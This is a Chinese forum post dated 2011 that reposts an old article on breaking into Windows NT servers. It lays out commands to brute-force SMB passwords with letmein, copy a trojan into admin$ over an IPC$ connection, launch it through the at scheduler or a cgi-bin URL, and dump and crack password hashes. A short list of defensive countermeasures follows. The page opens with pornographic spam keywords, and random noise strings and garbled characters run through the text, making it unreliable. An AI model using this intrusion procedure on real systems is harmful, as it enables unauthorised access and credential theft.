久久综合伊人噜噜色,日本三级香港三级人妇电影精品,亚洲中文色资源,国产高清一区二区三区人妖

      <small id="r7w9x"></small>

          <td id="r7w9x"></td><sub id="r7w9x"><menu id="r7w9x"><samp id="r7w9x"></samp></menu></sub>
        2. 

          4. <th id="r7w9x"></th>
          1. 

            汶上信息港
            
標(biāo)題: 遠(yuǎn)程入侵NT ----spp(低音炮) [打印本頁]
            

            
作者: 雜七雜八    時間: 2011-1-12 16:31
            
標(biāo)題: 遠(yuǎn)程入侵NT ----spp(低音炮)
            看了篇文章介紹使用netbus 或 netspy 遠(yuǎn)程入侵nt系統(tǒng),感覺真是。??磥韓t系統(tǒng)的共享機(jī)制如果不配合火墻使用,SMB會給你造成很大麻煩。?!∵B小小 只的木馬都可以讓nt管理員頭大。 
            
6 E% A) c& c; ^) w    其攻擊過程如下: " E- q0 X7 b3 n
            
1、使用掃描工具查找NT主機(jī)       * G8 f5 T5 r* l3 s9 t& o' w
            
2 、確定攻擊目標(biāo)后,使用letmein 對目標(biāo)主機(jī)進(jìn)行攻擊, 如: 
            
" F2 f+ \7 Q/ @, Qletmein file://x.x.x.x/ -all -g mypwd (對\\x.x.x.x上所有用戶攻擊) + Q) l8 w% b5 ?6 [( G$ m- w
            
letmein file://x.x.x.x/ -admin -g mypwd (對\\x.x.x.x上管理員攻擊) 
            
: _5 t9 k* C3 g% O: P0 W' w+ jletmein file://x.x.x.x/ -all -d mypwd (顯示\\x.x.x.x上所有用戶) 
            
5 K4 H) f0 `7 Y6 ]注:- 確定目標(biāo)后,收集目標(biāo)信息并嘗試取得非法資源 
            
1 S: ^; x. G0 r% [. m% r3、當(dāng)letmein 獲取相關(guān)管理員權(quán)限后,使用ms提供的合法命令: . \1 [; `$ y5 a
            
net use \\x.x.x.x\ipc$ "pass"/user:"user" 連接遠(yuǎn)程資源并將木馬拷入遠(yuǎn)程 * \3 i, s5 |( ~2 X6 u2 T
            
copy x:\netserver.exe \\x.x.x.x\admin$\system32 2 u, `$ _; W" ^$ L9 N3 C5 A9 C  G
            
4、使用合法ms命令遠(yuǎn)程啟動木馬服務(wù): 
            
. I1 |6 j" k" Q9 wnetsvc \\x.x.x.x schedule /start at \\x.x.x.x hh:mm netserver.exe /port:yourport /nomsg 
            
6 y& D% L+ A4 A$ T) K) l' t- O8 R5 F' q( U5 l
            
   該方法有其巧妙之處。。利用nt的任務(wù)計劃管理,在特定時候啟動木馬服務(wù) / v' q4 [# P- E$ n" U3 |6 K) H. q
            

            
' Q! s( `* Y, S2 g) m$ I   另一種方法: 
            
2 @+ ?; ~/ g. P+ E0 W   將ntsrver.exe 或其他運行程序Copy到目的服務(wù)器的www可執(zhí)行目錄, 如cgi-bin或scripts,然后在瀏覽器鍵入url如: http://x.x.x.x/scripts/ntsrver.exe /port:yourport 或 http://x.x.x.x/cgi-gin/ntsrver.exe /port:yourport 木馬服務(wù)將被啟動/ z0 N( X( x  {, V3 _0 e
            
. @1 a. p2 i2 E
            
    到此,該次攻擊可以算成功了,遠(yuǎn)程資源已在別人控制下。   T" i% Q' F: v. y& L
            
    如果在遠(yuǎn)程使用app redirect 啟動一個cmd.exe到特定端口 , 那么你可以telnet 到該端口,更方便使用該遠(yuǎn)程資源 。比如:使用pwdump 將遠(yuǎn)程nt上所有用戶和密碼 dump成文件,回傳本地,使用其他工具如l0phtcrack來運算。 分析該次攻擊的整體過程,不難看出,關(guān)鍵步驟是letmein取得admin權(quán)限,但是很不幸,就目前廈門(有些是省內(nèi))的nt服務(wù)器管理員而言,密碼對letmein只是多花幾分鐘而已。我對某些大的公共平臺服務(wù)器進(jìn)行掃描的結(jié)果,除了solaris和linux系統(tǒng)之外,其余的nt被letmein猜中率有75%以上。而且在這些被進(jìn)入的機(jī)器上,SMB都有在tcp/ip上 跑,有兩臺有配備火墻,但是沒有封閉對外137-139口。 
            
$ C/ r; r  {1 E. M" j
            
& J# h" I" F" h8 |     對策: " S/ E9 A* s; B2 U, m7 v
            
1、還是老話,密碼的選擇問題,使用向..@2KjsfiM7v!09..這樣的密碼會讓任何使用 暴力法計算的機(jī)器算到cpu燒掉。 
            
3 i* j! T* N; v$ g  q2、nt網(wǎng)絡(luò)的適當(dāng)配置,不要在對外的nc綁定共享服務(wù)是個好習(xí)慣,特別是tcp/ip協(xié)議。 
            
9 r( ~, p$ _+ [/ {# k3、防火墻的配置,屏蔽一切不需要的服務(wù)端口,象netebui在tcp/ip上的137-139口,開這些口只會使你的系統(tǒng)處于危險的處境,如果非要在遠(yuǎn)程使用這些口的服務(wù),建議使用其他軟件來代替。 4 R! F8 A! j$ q2 V1 u
            
4、及時檢查日記和監(jiān)控服務(wù)的運行,定時對文件系統(tǒng)的權(quán)限受托關(guān)系進(jìn)行檢查。 
            
1 |% y" d5 e( R  _% l5、管理人員素質(zhì)的提高,安全風(fēng)險意思加強無疑對你管理的系統(tǒng)有很多好處。 -- SPP 10Hz的低頻 你聽不到的聲音卻無時不刻在影響著你 。
            
) b! r# ^1 J! X0 M# z0 p4 ?




            

            

            歡迎光臨 汶上信息港 (http://m.junkejituan.com/)

Powered by Discuz! X3.5